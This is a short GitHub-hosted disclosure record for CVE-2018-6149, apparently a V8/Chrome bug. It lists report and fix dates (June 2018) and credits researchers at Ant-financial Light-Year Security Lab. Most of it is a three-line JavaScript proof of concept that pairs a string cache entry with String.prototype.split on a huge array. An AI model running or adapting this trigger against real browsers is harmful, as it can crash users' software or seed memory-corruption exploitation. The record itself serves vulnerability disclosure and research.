Skip to content

Latest commit

 

History

History
17 lines (12 loc) · 356 Bytes

CVE-2018-6149.md

File metadata and controls

17 lines (12 loc) · 356 Bytes
Raw

CVE-2018-6149

  • Report: Jun 2018
  • Fix: Jun 2018
  • Credit: Yu Zhou and Jundong Xie of Ant-financial Light-Year Security Lab

PoC

var str2 = String.fromCharCode(0x2c); //add `,` into single character string cache
var o2 = new Array(0x20000000);
String.prototype.split.call(o2,'');

Reference